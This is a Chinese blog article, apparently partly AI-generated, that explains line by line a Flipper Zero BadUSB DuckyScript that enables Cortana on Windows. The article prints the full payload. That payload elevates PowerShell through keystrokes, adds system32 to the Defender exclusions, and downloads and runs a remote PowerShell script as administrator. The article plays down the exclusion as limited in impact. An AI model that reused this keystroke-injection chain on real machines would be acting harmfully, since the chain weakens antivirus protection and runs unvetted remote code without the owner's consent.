恒美微站 Logo 恒美微站
  • 首页
  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心
  • 联系我们

Flipper Zero BadUSB:enable_cortana 脚本逐行解析——用 DuckyScript 在 Windows 上启用 Cortana

  • 首页
  • 资讯中心
  • /
  • Flipper Zero BadUSB:enable_cortana 脚本逐行解析——用 DuckyScript 在 Windows 上启用 Cortana

相关资讯

Telegraf Nebius Cloud Monitoring 输出插件:配置、认证与数据格式全解析 2026/9/14 6:48:16
汽车制造业数字化转型中的SAP解决方案与实践 2026/9/14 6:48:16
日志数据分析:从采集到智能应用的全链路实践 2026/9/14 6:48:16

最新资讯

数字员工与SaaW模式:从RPA进化到软件即员工的商业逻辑与实践指南
深度学习调参指南:Batch Size如何影响模型训练与泛化
NumPy手写数字识别系统:从零实现CNN前向与反向传播
优衣库数据驱动决策:零售业数据分析实战
hyperframes:解决多动态坐标系的机器人坐标变换管理方案
Through Their Eyes:用简单对齐实现跨被试与跨数据集视觉脑解码

今日推荐

ASP+Access库存管理系统源码部署与IIS配置实战指南
基于SSM框架的毕业季旧物分类处理系统设计与实现
MATLAB FFT频谱仿真:从DFT原理到参数设置与窗函数选择

本周热门

AI SDK Harness 依赖更新指南:掌握 harness 包 SDK 依赖的升级、桥接同步与一致性校验
Refine v5 Ant Design NumberField 组件实战:基于 Intl 的本地化数字格式化
Flutter应用改名全指南:从Android到iOS的配置与工具实践

本月精选

自研推理加速器Redwood:两周内实现PyTorch模型高效部署的实战教程
V4L2摄像头采集实战:从camera_client.rar到出图全流程解析
从“谁发明了钢琴键”到知识问答智能体:RAG与记忆工程实践

Flipper Zero BadUSB:enable_cortana 脚本逐行解析——用 DuckyScript 在 Windows 上启用 Cortana

发布时间:2026/9/14 6:48:16
Flipper Zero BadUSB:enable_cortana 脚本逐行解析——用 DuckyScript 在 Windows 上启用 Cortana Flipper Zero BadUSBenable_cortana 脚本逐行解析——用 DuckyScript 在 Windows 上启用 Cortana【免费下载链接】FlipperPlayground (and dump) of stuff I make or modify for the Flipper Zero项目地址: https://gitcode.com/GitHub_Trending/fl/Flipper本文以 Enable_Cortana 的 readme 为主体完整继承其“即插即用plug and play、打开 PowerShell、下载 ps1 脚本、启用 Cortana”的核心使用要点并结合同目录下的实际载荷 enable_cortana.txt 逐行拆解这条 BadUSB 链路的每一处细节DuckyScript 按键命令、UAC 提权技巧、PowerShell 命令的作用、延时参数的设置逻辑以及安全注意事项与常见故障排查。读完后你能够独立阅读并复刻同类 GoodUSB 脚本并在虚拟机中安全地测试它。脚本定位与使用方式enable_cortana属于 UNC0V3R3D BadUSB 收藏版中的GoodUSB分类脚本头部注释REM Category: GoodUSB亦标注了这一点。GoodUSB 指“对系统无害甚至有整理价值”的脚本合集与同系列中可能破坏系统的脚本明确区分开。按照 readme 的说明脚本的使用方式是plug and play即插即用将enable_cortana.txt放到 Flipper 的 SD 卡badusb目录仓库 README 推荐用 qFlipper 或手机 App 的 SD Card 功能拖入在 Flipper 上打开 BadUSB 应用选中该脚本将 Flipper 用 USB 线接入目标 Windows 电脑按中间键开始无需人工干预即可完成全部操作——这正是“plug and play”的含义脚本从拉起 PowerShell、提权、下载辅助脚本到执行全程自动化。整个 GoodUSB 目录下还有 Disable_Cortana、Activate_Windows、Win_Debloater 等同类脚本结构模式基本一致学会本文即可类推全部。载荷全文与逐行解析enable_cortana.txt 全文只有 18 行使用 DuckyScript 语法。完整内容如下REM Author: UNC0V3R3D REM Description: Enables the really annoying Cortana assistant. REM Version: 1.0 REM Category: GoodUSB DELAY 500 GUI r DELAY 500 STRING powershell Start-Process powershell -Verb runAs CTRL-SHIFT ENTER DELAY 1500 SHIFT TAB DELAY 500 ENTER DELAY 1500 STRING Add-MpPreference -ExclusionPath C:\Windows\system32 ENTER DELAY 500 STRING New-Object System.Net.WebClient | %{$_.DownloadFile(https://github.com/UNC0V3R3D/ressources/blob/main/enable_cortana.ps1, script.ps1); Start-Process powershell.exe -Verb runAs -ArgumentList -File script.ps1}, exit ENTER按执行阶段拆解阶段一启动 PowerShellDELAY 500 GUI r DELAY 500 STRING powershell Start-Process powershell -Verb runAs CTRL-SHIFT ENTERREM开头的四行是注释作者、用途、版本、分类。仓库 主 README 也指出BadUSB 脚本几乎每几行就有REM注释是理解脚本的主要线索。GUI r是 Win 键Super/Win 修饰键按下r作为独立命令表示“输入字符 r”——Win r打开Run运行对话框。STRING powershell Start-Process powershell -Verb runAs一次性把整条命令打进 Run 框。CTRL-SHIFT ENTERCtrlShiftEnter是 Run 对话框的“以管理员身份运行”快捷键等价于手动勾选 UAC 复选框后确认。注意这里不能只按ENTER否则拿到的是普通权限的 PowerShell。由此得到的是一个已提升为管理员的 PowerShell 窗口——这是后续所有敏感操作的前提也解释了为何 readme 把第一步功能概括为 “open powershell”。阶段二确认 UAC 与焦点切换DELAY 1500 SHIFT TAB DELAY 500 ENTER DELAY 1500DELAY 1500等待管理员 PowerShell 窗口弹出毫秒级1.5 秒。SHIFT TABENTER这段是处理弹出后的焦点/对话框状态通过 Tab 反向切换焦点再回车确认确保后续STRING内容被正确输入到目标窗口。仓库 主 README 的 Troubleshooting 章节 明确指出如果脚本“把字打到了不该打的地方”最常见原因就是延时太短应把DELAY 500调大到DELAY 700甚至更高。因此本脚本中 500/1500ms 的取值是按典型 Windows 10/11 桌面响应时间设定的较慢机器上建议整体调高。阶段三添加 Defender 排除项STRING Add-MpPreference -ExclusionPath C:\Windows\system32 ENTERAdd-MpPreference -ExclusionPath C:\Windows\system32把C:\Windows\system32加入 Windows Defender 的排除路径列表。从源码结构看这一步的目的是降低后续下载并执行script.ps1时被实时防护拦截的概率。需要注意该命令需要管理员权限脚本已在阶段一取得它只是排除一个路径不是关闭 Defender影响范围有限但仍属于安全敏感操作如果目标系统未安装/启用 Windows Defender如某些精简版或企业策略环境此命令会报错但不影响后续行继续执行BadUSB 脚本是“盲打”的不会读屏幕反馈。阶段四下载并执行辅助 ps1 脚本STRING New-Object System.Net.WebClient | %{$_.DownloadFile(https://github.com/UNC0V3R3D/ressources/blob/main/enable_cortana.ps1, script.ps1); Start-Process powershell.exe -Verb runAs -ArgumentList -File script.ps1}, exit ENTER这一行是整条链路的“载荷核心”用管道把两件事串起来下载New-Object System.Net.WebClient创建 WebClient 对象%{...}即ForEach-Object的别名内调用.DownloadFile(url, script.ps1)把作者的enable_cortana.ps1从仓库下载为当前目录下的script.ps1。真正的“启用 Cortana”逻辑全部在这个 ps1 里DuckyScript 本身只做投递。执行Start-Process powershell.exe -Verb runAs -ArgumentList -File script.ps1再次以管理员身份运行下载下来的脚本最后exit关闭当前窗口。readme 的 Features 列表“download ps1 script”、“enable cortana”对应的就是这两个动作。与 Disable_Cortana 的对照GoodUSB 目录下同时存在 Disable_Cortana/disable_cortana.txt两份脚本除两处外逐行相同差异点Enable_CortanaDisable_CortanaREM DescriptionEnables the really annoying Cortana assistant.Disable the really annoying Cortana assistant.下载的 ps1enable_cortana.ps1disable_cortana.ps1这说明该系列脚本采用“统一投递框架 远程 ps1 承载业务逻辑”的模式DuckyScript 负责“开窗—提权—下载—执行”的可靠通道功能差异完全由远程 ps1 决定。从源码结构看这种设计的优点是 DuckyScript 部分可以大量复用、调试延时只需一次风险则是目标机必须能访问作者仓库且 ps1 内容不随脚本存放于本机执行前无法在本地审计实际做了什么——这点对评估任何同类 BadUSB 脚本都适用。安全与测试建议结合仓库 主 README 的免责声明与使用说明测试该脚本前请注意只在虚拟机里测试。该脚本会执行以管理员运行 PowerShell、修改 Defender 排除项、从远程下载并执行未知 ps1。仓库建议“use a virtual machine for safety”对这类含网络下载行为的脚本尤其必要。遵守使用协议README 强调需先阅读并接受 Usage Agreement脚本仅供教育目的未经授权不得在他人设备上运行作者不对造成的损害负责。确认目标环境有网络阶段四依赖从 GitHub 下载 ps1断网环境下脚本会卡在下载步骤并超时退出。UAC 依赖若目标系统把 UAC 设为“从不通知”CTRL-SHIFT ENTER仍会以管理员拉起 PowerShell若被组策略禁止提权则后续Add-MpPreference会因权限不足失败。可复现性脚本头部标注Version: 1.0与 主 README 的 Release History 中 v2.2 “Added the GoodUSB folder” 相对应属于 GoodUSB 系列的首批脚本之一。常见故障排查直接引用 主 README Troubleshooting 的两类高频问题并结合本脚本给出对策ERROR: line 5之类的行号报错Flipper 的 DuckyScript 解析器对空行和缩进敏感。检查enable_cortana.txt中命令之间是否存在多余空行、行首空格且确认文件中没有LOCALE命令Flipper 上该命令不能正常工作。输入错位/打到错误窗口延时不足。把脚本中每个DELAY 500提升到DELAY 700或更大对本脚本而言重点加长的是阶段二的DELAY 1500管理员窗口弹出和阶段三的DELAY 1500UAC 确认完成。下载失败多为网络不可达或目标机 PowerShell 执行策略拦截。可在测试机先用普通 PowerShell 手动执行同一DownloadFile语句验证连通性。小结enable_cortana虽然只有 18 行却是一条结构完整的 BadUSB 自动化链路WinR打开 Run →CtrlShiftEnter提权启动 PowerShell →Add-MpPreference降低防护干扰 →WebClient下载远程 ps1 并以管理员身份执行。掌握这套“统一投递框架”后你可以同样方式阅读 GoodUSB 目录下的其余脚本理解其中的延时设计、UAC 交互与远程载荷投递模式也是阅读本仓库整个 BadUSB 目录BadUSB 总说明、UNC0V3R3D 收藏版主 README的基础。所有操作请务必遵守授权前提并优先在隔离的虚拟机环境中验证。【免费下载链接】FlipperPlayground (and dump) of stuff I make or modify for the Flipper Zero项目地址: https://gitcode.com/GitHub_Trending/fl/Flipper创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

关于恒美微站

恒美微站专注于为个体商户、工作室提供极简自助建站服务,让每个人都能轻松拥有专业网站。

快速链接

  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心

服务项目

  • 可视化建站
  • 拖拽编辑
  • 主题定制
  • SEO 优化
  • 网站托管

联系方式

  • 📍 地址:北京市朝阳区建国路 88 号
  • 📞 电话:400-888-8888
  • ✉️ 邮箱:info@hmyw.cn
  • 🕐 时间:周一至周日 9:00-18:00

© 2024 恒美微站 hmyw.cn 版权所有 | 京 ICP 备 12345678 号